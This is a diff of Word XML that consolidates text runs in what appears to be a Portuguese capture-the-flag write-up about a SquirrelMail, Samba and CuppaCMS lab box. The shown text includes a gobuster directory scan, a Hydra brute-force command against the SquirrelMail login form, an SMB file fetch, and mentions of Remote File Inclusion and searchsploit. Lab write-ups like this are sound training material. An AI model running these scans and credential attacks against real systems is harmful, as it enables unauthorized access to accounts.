-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>/wordlists/common.txt -</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>u  http</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>://</w:t>
+        <w:t xml:space="preserve"> gobuster dir -w /usr/share/dirb/wordlists/common.txt -u  http://</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3243,71 +2592,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Após a análise do </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>gobuster</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>, foi possível acessar o “</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>squirrelmail</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>” ,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>email</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> do nosso alvo.</w:t>
+        <w:t>Após a análise do gobuster, foi possível acessar o “squirrelmail” , o email do nosso alvo.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3376,69 +2661,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Com o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Hydra</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>, o</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>bruteforce</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> vai ser </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>realizado  e</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> também a resposta da primeira pergunta.</w:t>
+        <w:t>Com o Hydra, o</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> bruteforce vai ser realizado  e também a resposta da primeira pergunta.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3450,7 +2681,6 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -3460,130 +2690,34 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>Comando</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:i/>
+        <w:t>Comando usado:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:i/>
+        <w:t xml:space="preserve"> hydra -l mile</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>usado</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:i/>
+        <w:t>sdyson -P log1.txt &lt;ip_target&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> hydra -l </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>mile</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sdyson</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -P log1.txt &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ip_target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> http-post-form "/squirrelmail/src/login.php:login_username=^USER^&amp;secretkey=^PASS^&amp;js_autodetect_results=1&amp;just_logged_in=</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>1:Unknown</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> user or password incorrect."</w:t>
+        <w:t xml:space="preserve"> http-post-form "/squirrelmail/src/login.php:login_username=^USER^&amp;secretkey=^PASS^&amp;js_autodetect_results=1&amp;just_logged_in=1:Unknown user or password incorrect."</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3692,43 +2826,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Com o acesso ao </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>email</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, e olhando eles, há um que chama muita atenção. Provavelmente sendo a senha do samba </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>client</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> do Miles.</w:t>
+        <w:t>Com o acesso ao email, e olhando eles, há um que chama muita atenção. Provavelmente sendo a senha do samba client do Miles.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3818,25 +2916,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">A senha estava correta, agora só dar uma olhada </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>no arquivos</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> e no diretório “notes”</w:t>
+        <w:t>A senha estava correta, agora só dar uma olhada no arquivos e no diretório “notes”</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3958,25 +3038,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>mget</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> importante.txt</w:t>
+        <w:t xml:space="preserve"> mget importante.txt</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4189,22 +3251,8 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">Remote File </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:iCs/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Inclusion</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Remote File Inclusion</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4334,85 +3382,7 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> isso, é necessário usar novamente o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:iCs/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>gobuster</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:iCs/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:iCs/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>pórem</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:iCs/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> agora com o novo diretório. Achando o </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:iCs/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>“ /</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:iCs/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>administrator”</w:t>
+        <w:t xml:space="preserve"> isso, é necessário usar novamente o gobuster, pórem agora com o novo diretório. Achando o “ /administrator”</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4452,7 +3422,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -4463,9 +3432,8 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>gobuster</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>gobuster dir -w /usr/share/dirb/wordlists</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -4476,163 +3444,7 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:iCs/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>dir</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:iCs/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -w /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:iCs/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>usr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:iCs/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:iCs/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>share</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:iCs/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:iCs/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>dirb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:iCs/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:iCs/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>wordlists</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:iCs/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>/common.txt -</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:iCs/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>u  http</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:iCs/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>://&lt;ip_target&gt;</w:t>
+        <w:t>/common.txt -u  http://&lt;ip_target&gt;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4752,9 +3564,8 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">que a página está executando o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>que a página está executando o CuppaCM</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -4764,43 +3575,7 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>CuppaCM</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. Então utilizar o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>searchsploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> para procurar alguma falha.</w:t>
+        <w:t>. Então utilizar o searchsploit para procurar alguma falha.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -4906,31 +3681,7 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">Então apenas falta escolher o único acessível e </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>baixa-lo</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>.</w:t>
